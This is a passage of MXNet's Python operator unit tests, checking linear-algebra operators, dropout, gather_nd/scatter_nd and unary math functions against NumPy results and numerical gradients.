b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow_mat, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break for dtype=np.float64:
# the backward gradient for the unused output then comes back with dtype np.float32.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
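def _demo_syevd_identities():
    # Illustrative NumPy sketch, not part of the test suite, of the two
    # identities _syevd_combined_symbol checks (with rows of U holding the
    # eigenvectors, matching how the combined symbol multiplies terms):
    # U U^T = I and U^T diag(lam) U = A.
    a = np.random.normal(0., 1., (5, 5))
    a = 0.5 * (a + a.T)
    lam, vecs = np.linalg.eigh(a)  # columns of vecs are eigenvectors
    u = vecs.T                     # rows as eigenvectors
    assert np.allclose(np.dot(u, u.T), np.eye(5))
    assert np.allclose(np.dot(u.T, lam[:, None] * u), a)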
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as these need CUDA 8,
# while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
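# The helper above is the standard adjoint of the symmetric eigendecomposition
# (rows of u are eigenvectors; eigenvalues are assumed distinct): with
# G = grad_u u^T, it computes grad_a = u^T (diag(grad_l) + S) u, where
# S[i, j] = (G[i, j] - G[j, i]) / (2 * (l[i] - l[j])) for i != j and S[i, i] = 0.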
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs CUDA 8,
# while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs CUDA 8,
# while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test triangle extraction via a full roundtrip, since the intermediate extracted
# triangle uses a different element ordering than numpy's.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: test fails intermittently when cudnn is on; cudnn is temporarily disabled until this gets fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure the input contains no zeros (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# The relative error should stay within ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
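# With axes-wise dropout the mask is broadcast along the dropped axes, so
# every slice taken along such an axis must be identical: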
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert (get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
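# unlike scatter_nd, _backward_gather_nd accumulates at duplicate indices:
# 2 + 3 both land on position (1, 1)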
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check that out-of-bounds indices are detected
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
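def _demo_smooth_l1_transition():
    # Illustrative sketch, not part of the test suite: smooth L1 switches
    # from quadratic to linear at |x| = 1/sigma**2, and both the value and
    # the derivative defined above are continuous at that point.
    sigma = 2.0
    x0 = 1.0 / sigma**2
    eps = 1e-6
    assert np.isclose(np_smooth_l1(x0 - eps, sigma), np_smooth_l1(x0 + eps, sigma), atol=1e-5)
    assert np.isclose(np_smooth_l1_grad(x0 - eps, sigma), np_smooth_l1_grad(x0 + eps, sigma), atol=1e-4)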
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
    except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
    shape = (9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
